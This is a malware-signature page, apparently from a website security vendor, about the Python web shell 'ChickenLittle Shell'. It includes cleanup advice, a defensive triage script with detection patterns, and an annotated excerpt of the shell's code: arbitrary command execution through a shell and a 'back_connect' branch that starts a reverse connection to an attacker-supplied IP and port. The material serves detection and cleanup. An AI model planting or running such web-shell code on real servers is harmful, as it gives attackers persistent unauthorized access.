Malware Signatures

py.backdoor.chickenlittle-shell.001

Backdoors are server-side malicious scripts intended to give the attacker persistent, unauthorized access to the server.
Typical examples are file managers, web shells, tools for bypassing the admin login, and single-purpose scripts that let the attacker upload and run other malicious scripts without authorization.
Only the payload's result (for example the web shell interface) is visible in the browser, not the malicious code itself. Backdoors very commonly leave no visible trace in the site's pages, so they cannot be detected by visiting the infected site from outside.
Server-level analysis is necessary in case of infection by this type of malware.

ChickenLittle Shell is a simple script, written in Python, that provides basic web shell functionality: file and network operations, and shell command execution. The dump below also shows a "back_connect" command that writes a helper script to disk and launches it as a separate process connecting out to an attacker-supplied IP and port.

Affecting

Any server with Python installed. Outdated software or compromised passwords can act as the infection vector.

Cleanup

Inspect your server for any unknown Python files and remove them. Note that web servers usually do not execute .py files without explicit configuration. To work around this, attackers usually add a .py extension handler
in .htaccess files; find such files and remove any handlers that your site does not need. Alternatively, the files can be placed in special directories that allow execution of CGI scripts (e.g. cgi-bin). On some servers we found
this shell script with the .sh extension, so do not limit the search to the .py extension.
You can sign up with us and let our team remove the malware for you.
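A server-side triage script for the cleanup steps above, as an added example that is not part of this page or of the malware: given a web root (here a constructed temporary tree; the path, the sample .htaccess and the sample files are assumptions), it reports .htaccess files that register a CGI handler for .py/.sh or turn on ExecCGI, lists every .py/.sh file (and any file starting with a Python shebang) for manual review, and flags those that carry at least two strings taken from the dump below (the ChickenLittle banner, cgitb.enable(), back_connect, a shell=True Popen). To use it on a real server, pass the document root to scan_webroot().

```python
"""Triage a web root for ChickenLittle-style Python web shells.

Added example, not the page's or the malware's code. Indicator strings are
taken from the dump on this page; paths, thresholds and samples are assumed.
"""
import os
import re
import shutil
import tempfile

# .htaccess directives that make .py/.sh files executable by Apache.
HTACCESS_PATTERNS = [
    re.compile(r"^\s*AddHandler\s+cgi-script\b.*\.(py|sh)\b", re.I),
    re.compile(r"^\s*SetHandler\s+cgi-script\b", re.I),
    re.compile(r"^\s*Options\b(?!.*-ExecCGI).*\bExecCGI\b", re.I),
]

# Strings lifted from the dump; two or more in one file is treated as a hit.
CONTENT_INDICATORS = {
    "chickenlittle_banner": re.compile(r"ChickenLittle Shell"),
    "cgitb_enable": re.compile(r"cgitb\.enable\(\)"),
    "back_connect": re.compile(r"\bback_connect\b"),
    "shell_true_popen": re.compile(r"subprocess\.Popen\(.*?shell\s*=\s*True", re.S),
}


def scan_htaccess(text):
    """Return the .htaccess lines that would let Apache execute .py/.sh files."""
    return [line.strip() for line in text.splitlines()
            if any(p.search(line) for p in HTACCESS_PATTERNS)]


def score_script(text):
    """Return the names of the dump-derived indicators present in a script body."""
    return [name for name, rx in CONTENT_INDICATORS.items() if rx.search(text)]


def scan_webroot(root, min_indicators=2):
    """Walk root and return (path, kind, detail) findings for manual review."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            if name == ".htaccess":
                for line in scan_htaccess(text):
                    findings.append((path, "htaccess_handler", line))
            # Renamed shells keep their shebang, so check that as well as the extension.
            elif name.endswith((".py", ".sh")) or text.startswith("#!/usr/bin/python"):
                hits = score_script(text)
                kind = "webshell_indicators" if len(hits) >= min_indicators else "unknown_script"
                findings.append((path, kind, ",".join(hits)))
    return findings


# Constructed samples (assumed, not taken from any real server): a handler-adding
# .htaccess, a stub mimicking the dump's banner and Popen usage, and a benign file.
SAMPLE_HTACCESS = """\
# legitimate rewrite rules
RewriteEngine On
AddHandler cgi-script .py .sh
Options +ExecCGI
"""
SAMPLE_SHELL = '''#!/usr/bin/python
"""
ChickenLittle Shell by Zep
"""
import cgitb; cgitb.enable()
import subprocess
def run_command(command):
    p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
    return p.stdout.read()
'''
SAMPLE_BENIGN = "import json\nprint(json.dumps({'ok': True}))\n"


def build_sample_tree():
    """Create a throwaway web root containing the constructed samples."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "uploads"))
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write(SAMPLE_HTACCESS)
    with open(os.path.join(root, "uploads", "img.py"), "w") as fh:
        fh.write(SAMPLE_SHELL)
    with open(os.path.join(root, "tools.py"), "w") as fh:
        fh.write(SAMPLE_BENIGN)
    return root


def demo():
    """Scan the constructed tree, clean it up, and return the findings."""
    root = build_sample_tree()
    try:
        return scan_webroot(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, kind, detail in demo():
        print("%-22s %s  %s" % (kind, path, detail))
```

Every .py/.sh file is reported, not only the ones with indicators, because the cleanup advice is to review all unknown Python files; the indicator threshold just orders the work. Handlers found in .htaccess should be removed unless the site actually needs CGI execution in that directory.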

Dump

... excerpts ...

#!/usr/bin/python
"""
ChickenLittle Shell by Zep
"""

# cgitb.enable() renders Python tracebacks into the HTTP response, so the
# operator sees errors in the browser instead of a blank 500 page.
try:
    import cgitb; cgitb.enable()
except:
    pass
import sys, cgi, os, base64, subprocess
from time import strftime
from string import Template

bind_port =

...

html = Template("""
<html>
<head>
<title>ChickenLittle Shell</title>

...

<center><h2>=== ChickenLittle Shell ===</h2></center>
<a href="javascript:void(0)" onclick="javascript:toggleEnviron()">Show/Hide Environment variables</a>
$environ_table
<p />
<table width="100%">
<tr><td>
uname -a: $uname <br />

...

<td style="text-align:center"><b>(.)(.) [ChickenLittle Shell by Zep] (.)(.)</b></td>
</tr>
</table>
</body>
</html>
""")

scriptname = ""

if os.environ.has_key("SCRIPT_NAME"):
    scriptname = os.environ["SCRIPT_NAME"]

def get_environ_table():
    # Dumps every CGI environment variable (paths, server software, client
    # address) into a hidden table the operator can toggle from the page.
    s = '<table style="display:none" id="environ_table">'
    for k in os.environ:
        s += "<tr><td>%s</td><td>%s</td></tr>" % (k, os.environ[k])
    s += "</table>"
    return s

def run_command(command):
    # Runs the attacker-supplied string through the system shell (shell=True)
    # as the web server user and returns combined stdout/stderr.
    p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
    (i, o) = p.stdin, p.stdout
    return o.read()

...

    elif command == "back_connect":
        # Writes the back_connect payload to a file via put_script() and launches
        # it as a separate process that connects out to the supplied ip:port.
        port = get_param(form, "port")
        ip = get_param(form, "ip")
        file_name = put_script("bc", back_connect)
        pid = subprocess.Popen(["python %s %s %s" % (file_name, ip, port)], shell=True).pid
        command_result = "Process ID : %d " % pid

    elif command != None:
        command_result = run_command(command)

    list_files = run_command("ls -alh " + cur_dir)

    print html.substitute(environ_table=get_environ_table(),
                          uname=uname,
                          uid=uid,
                          list_files=list_files,
                          cur_dir=cur_dir,
                          command_result=command_result,
                          file_content=file_content,
                          file_name=file_name,
                          edit_file_box_visibility=edit_file_box_visibility
                          )

if __name__ == '__main__':
    main()